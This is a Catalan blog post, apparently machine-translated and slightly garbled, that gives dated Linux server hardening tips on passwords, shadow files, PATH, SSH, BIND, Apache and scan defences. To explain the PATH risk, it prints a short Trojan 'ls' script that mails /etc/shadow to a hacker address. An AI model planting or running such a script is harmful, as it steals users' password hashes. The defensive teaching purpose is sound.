Consells de seguretat per al teu Linux (Servidor) (Part 1)

@Jlcmux

5 minuts

Fa molt de temps no publico res al bloc i m'agradaria compartir alguns consells extrets d'un llibre que, (Entre altres). Vaig trobar a la Universitat i acabo de llegir i encara que sincerament aquesta una mica obsolet i les tècniques mostrades són molt poc probables que funcionin atesa l'evolució del sistema, de la mateixa manera són aspectes interessants que es poden mostrar. 9788448140502

Vull aclarir que són consells orientats a un sistema Linux que sigui usat com a servidor, a mitjana o potser gran escala atès que a nivell dusuari descriptori, encara que poden aplicar-se, no serien molt útils.

També adverteixo que són simples consells ràpids i no entraré gaire en el detall, encara que tinc pensat fer un altre post molt més específic i extens sobre un tema en particular. Però això ho veuré després. Comencem.

Polítiques de contrasenya. 

Tot i que soni a frase de calaix, tenir una bona política de contrasenyes fa la diferència entre un sistema vulnerable o no. Atacs com a «força bruta» s'aprofiten de tenir una mala contrasenya per accedir a un sistema. Els tipus més comuns són:

  • Combinar majúscules i minúscules.
  • Usar caràcters especials.
  • Nombres.
  • Més de 6 dígits (tant de bo més de 8 dígits).

A més d'això, tinguem en compte dos fitxers essencials.  /etc/passwd i /etc/shadow.

Una cosa molt important és que larxiu /etc/passwd. a més de donar-nos el nom de lusuari, el seu uid, carpeta path, bash.. etc. en alguns casos també mostra la clau encriptada de lusuari.

 Mirem-ne la composició típica.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

usuari:clavecrypt:uid:gid:path::path:bash

El problema real aquí, és que aquest fitxer en particular té permisos -rw-r–r– cosa que significa que té permisos de lectura per qualsevol usuari del sistema. i tenint la clau encriptada no és gaire difícil desxifrar la real.

Per això existeix el fitxer / Etc / shadow. Aquest és el fitxer on s'emmagatzemen totes les claus dels usuaris, entre d'altres. Aquest fitxer té els permisos necessaris perquè cap usuari el pugui llegir.

Per arreglar això llavors, hem d'anar a l'arxiu / etc / passwd i canviar la clau encriptada per una «x», això farà que la clau només sigui guardada al nostre arxiu / Etc / shadow.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Problemes amb el PATH i .bashrc i altres.

Quan un usuari executa una ordre a la consola, l'intèrpret d'ordres cerca aquesta ordre en una llista de directoris que conté la variable d'entorn PATH.

Si escriviu «fet $PATH» a la consola sortireu alguna cosa com això.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Cadascuna d'aquestes carpetes és on l'intèrpret d'ordres cercarà l'ordre escrita per executar-la. El «.» significa que la primera carpeta que voleu cercar és la mateixa carpeta des d'on s'executa l'ordre.

Suposeu que existeix un usuari «carlos» i aquest usuari vol «fer maldats». Aquest usuari podria deixar un fitxer anomenat «ls» a la carpeta principal, i en aquest fitxer executar una ordre com:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

I si l'usuari root per coses del destí, intenta llistar les carpetes dins de la carpeta de carlos (com primer busca l'ordre en aquesta mateixa carpeta, sense adonar-se'n estaria enviant el fitxer amb les contrasenyes a aquest correu i després es llistaria les carpeta i no se n'adonaria fins molt tard.

Per evitar això hem d'eliminar el «.» de la variable PATH.

D'aquesta mateixa manera cal auditar fitxers com /.bashrc, /.bashrc_profile, ./.login i revisar que no existeixi «.» a la variable PATH, i de fet des de fitxers com aquest, es poden canviar el destí d'alguna ordre específica.

Consells amb serveis:

SHH

  • Deshabiliteu la versió 1 del protocol ssh al arcvhio sshd_config.
  • No permeteu que l'usuari root es pugui llogar per ssh.
  • Els fitxers i carpetes ssh_host_key, ssh_host_dsa_key i ssh_host_rsa_key només han de ser llegits per l'usuari root.

BIND

  • Canviar el missatge de benvinguda a l'arxiu named.conf per que no mostri el número de versió
  • Limitar les transferències de zones, i només habilitar-la per als equips que ho necessitin.

Apache

  • Eviteu que el servei mostri la vostra versió en el missatge de benvinguda. Editeu el fitxer httpd.conf i afegiu o modifiqueu les línies:  

ServerSignature Off
ServerTokens Prod

  • Desactivar indexació automàtica
  • Configureu apatxe perquè no serveixi fitxers sensibles com .htacces, *.inc, *.jsp.. etc
  • Eliminar pagines de manual o exemple del servei
  • Executar apatxe en un entorn acotat «chroot»

Seguretat de xarxa.

És indispensable cobrir totes les possibles entrades al vostre sistema des de la xarxa externa, a continuació alguns consells indispensables per evitar que intrusos escanegin i obtinguin informació de la vostra xarxa.

Bloquejar trànsit ICMP

S'ha de configurar el tallafoc perquè bloquegi tot tipus de trànsit i respostes de ressò entrants i sortints tipus ICMP. Amb això t'evites que, per exemple, un scanner que estigui buscant equips vius en un rang d'ip et localitzi. 

Evitar escaneig de ping TCP.

Una manera d'escanejar el vostre sistema és l'escaneig de ping TCP. Suposeu que al vostre servidor hi ha un servidor Apache al port 80. L'intrús podria enviar una petició ACK a aquest port, amb això, si el sistema respon es donarà fet que l'equip estigui viu i escanejarà la resta de ports.

Per a això, el vostre firewall hauria de tenir sempre l'opció «coneixement d'estat» i hauria de descartar tots els paquets ACK que no corresponguin a una connexió o sessió TCP ja establerta.

Alguns consells addicionals:

  • Utilitzeu sistemes IDS per detectar escanejats de ports a la vostra xarxa.
  • Configura Firewall perquè no confiï en els valors de port d'origen de la connexió.

Això és atès que alguns escaneigs utilitzen un port «fals» origen tal com el 20 o 53, atès que molts sistemes confien en aquests ports perquè són els típics d'un ftp o un DNS.

NOTA: Recordeu que la majoria de problemes indicats en aquest post ja han estat solucionats a la gairebé totes les distribucions actuals. Però mai no està de més tenir informació clau d'aquests inconvenients perquè no et passin.

NOTA: Posteriorment veuré algun tema en especific i faré un post amb molta més informació detallada i més actual.

Gràcies a tothom per llegir.

Salutacions.


Deixa el teu comentari

La seva adreça de correu electrònic no es publicarà. Els camps obligatoris estan marcats amb *

*

*

  1. Responsable de les dades: Miguel Ángel Gatón
  2. Finalitat de les dades: Controlar l'SPAM, gestió de comentaris.
  3. Legitimació: El teu consentiment
  4. Comunicació de les dades: No es comunicaran les dades a tercers excepte per obligació legal.
  5. Emmagatzematge de les dades: Base de dades allotjada en Occentus Networks (UE)
  6. Drets: En qualsevol moment pots limitar, recuperar i esborrar la teva informació.

  1.   informàtic va dir
    fa 8 anys

    M'ha agradat molt l'article i estic interessat en el tema, us animo a seguir pujant continguts.

    Respondre a informàtic